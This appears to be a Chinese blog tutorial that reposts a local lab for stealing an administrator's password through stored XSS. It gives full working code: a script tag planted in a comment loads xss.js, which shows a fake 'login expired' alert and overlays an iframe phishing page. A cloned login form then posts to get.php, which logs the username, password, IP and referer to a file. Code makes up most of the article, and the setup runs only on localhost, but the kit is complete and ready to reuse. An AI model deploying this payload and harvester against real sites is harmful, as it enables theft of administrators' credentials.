devbox
繁依Fanyi0
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

xss获取管理员的用户密码(本地实战)

作者:繁依Fanyi0 | 2024-03-03 12:17:35

xss获取管理员的用户密码(本地实战)

 更上一层楼!!!

环境准备

phpstudy

实战

phpstudy指定localhost目录下编写如下文件:

  1. admin_login.html  //原管理登录页面
  2. admin_index.html  //原管理后台页面
  3. fish.html         //我们高仿的登录页面,也就是钓鱼页
  4. get.php           //数据接收文件
  5. xss.js            //xss的payload

代码量比较少,就此复制粘贴即可

admin_login.html

  1. //admin_login.html  原管理登录页面
  2. <html>
  3. <body>
  4. <head><title>管理员登录</title></head>
  5. <form method="post" action="http://xxx/x.php">
  6. 用户名:<br>
  7. <input type="text" name="username">
  8. <br>
  9. 密码:<br>
  10. <input type="text" name="password">
  11. <br><br>
  12. <input type="submit" value="登录">
  13. </form> 
  14. </body>
  15. </html>

admin_index.html

  1. //admin_index.html  原管理后台页面
  2. <html>
  3. <body>
  4. <head><title>管理员后台</title></head>
  5. <h1>这里是管理员后台,你已成功登录</h1>
  6. <button type="button">一键日卫星</button>
  7. <hr><b>最新留言</b>
  8. <ul>
  9. <li>说书人长得好帅</li>
  10. <li>楼上说得对<script src= "http://127.0.0.1/xss.js"></script></li>
  11. </ul>
  12. </body>
  13. </html>

fish.html

  1. //fish.html  我们仿的登录页面,也就是钓鱼页
  2. <body>
  3. <head><title>管理员登录</title></head>
  4. <form method="post" action="http://127.0.0.1/get.php">//这里发送给接收程序
  5. 用户名:<br>
  6. <input type="text" name="username">
  7. <br>
  8. 密码:<br>
  9. <input type="text" name="password">
  10. <br><br>
  11. <input type="submit" value="Submit">
  12. </form> 
  13. </body>
  14. </html>

get.php

  1. //get.php  数据接收文件
  2. <?php
  3. $line = '----------------------------------'."\r\n";
  4. $user = '账号:'.$_POST['username']."\r\n";
  5. $pwd = '密码:'.$_POST['password']."\r\n";
  6. $ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";
  7. $url = '钓鱼模板:'.getenv('HTTP_REFERER')."\r\n";
  8. $date ='日期:'. date("Y-m-d")."\r\n";
  9. $result = $line.$url.$user.$pwd.$ip.$date;
  10. file_put_contents('good.txt',$result, FILE_APPEND);
  11. header("Location: http://127.0.0.1/admin_index.html");
  12. ?>

xss.js

  1. //xss.js  xss的payload
  2. setTimeout(function() {
  3.     alert("登陆过期,请重新登陆!");
  4.     parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src = \"127.0.0.1/fish.html\" frameBorder=0 scrolling=no></iframe>");
  5.     setTimeout(function() {
  6.         document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;");
  7.     },
  8.     100);
  9.     setTimeout(function() {
  10.         parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;");
  11.     },
  12.     100);
  13. },
  14. 600000);

进入网页admin_login.html进行实战

实战完成后,在编写的所有文件目录下查找good.txt,上面记录的管理员的账户密码。实战结束

留言

服务器的可以在服务器上实战。祝你们学习顺利!!!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/184632
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号